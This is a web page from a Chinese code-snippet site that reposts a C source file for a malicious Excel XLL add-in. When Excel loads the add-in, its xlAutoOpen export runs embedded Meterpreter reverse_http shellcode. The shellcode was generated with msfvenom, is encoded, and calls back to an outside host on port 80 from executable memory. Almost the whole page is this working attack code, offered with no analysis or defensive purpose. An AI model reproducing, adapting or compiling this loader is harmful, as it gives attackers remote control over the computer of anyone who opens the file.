c_cpp shellcode_ExcelRegisterXLL.c
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了c_cpp shellcode_ExcelRegisterXLL.c相关的知识,希望对你有一定的参考价值。
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x6a\x50\xe8\x37\x01"
"\x00\x00\x2f\x4d\x4c\x71\x4e\x48\x77\x66\x52\x64\x69\x4f\x65"
"\x57\x70\x39\x62\x78\x79\x32\x53\x4d\x67\x74\x46\x42\x65\x31"
"\x45\x46\x58\x48\x55\x31\x78\x6b\x31\x4b\x69\x2d\x2d\x4f\x36"
"\x48\x71\x34\x58\x57\x36\x51\x57\x43\x2d\x6a\x37\x76\x57\x37"
"\x45\x38\x49\x49\x33\x6b\x64\x31\x4e\x4c\x4f\x76\x69\x67\x52"
"\x62\x70\x53\x71\x42\x4d\x58\x46\x39\x31\x69\x55\x7a\x73\x48"
"\x62\x58\x4c\x37\x2d\x6f\x48\x4d\x79\x41\x79\x6d\x71\x36\x71"
"\x5f\x75\x71\x34\x30\x4c\x4c\x61\x54\x6e\x36\x62\x39\x6e\x4c"
"\x5f\x59\x70\x50\x50\x69\x2d\x36\x67\x63\x44\x79\x51\x48\x4c"
"\x62\x76\x44\x5a\x33\x55\x39\x43\x56\x78\x72\x75\x47\x56\x68"
"\x63\x37\x50\x44\x6e\x4a\x77\x30\x47\x2d\x6c\x52\x70\x68\x39"
"\x2d\x6e\x39\x50\x4a\x59\x53\x6c\x6e\x5f\x49\x71\x49\x67\x53"
"\x51\x33\x41\x34\x33\x56\x37\x59\x5a\x69\x73\x57\x6f\x75\x72"
"\x61\x41\x4b\x6f\x64\x46\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5"
"\x89\xc6\x53\x68\x00\x02\x60\x84\x53\x53\x53\x57\x53\x56\x68"
"\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56"
"\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x08\x4f\x75\xed\xe8"
"\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40"
"\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57"
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85"
"\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8"
"\x8b\xff\xff\xff\x61\x6e\x79\x2e\x77\x65\x62\x73\x69\x74\x65"
"\x2e\x63\x6f\x6d\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
void *exec = VirtualAlloc(0, sizeof b, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, b, sizeof b);
((void(*)())exec)();
return 1;
}
void __cdecl xlAutoOpen() {
HANDLE threadHandle;
// Create a thread and close the handle as we do not want to use it to wait for it
threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
CloseHandle(threadHandle);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}以上是关于c_cpp shellcode_ExcelRegisterXLL.c的主要内容,如果未能解决你的问题,请参考以下文章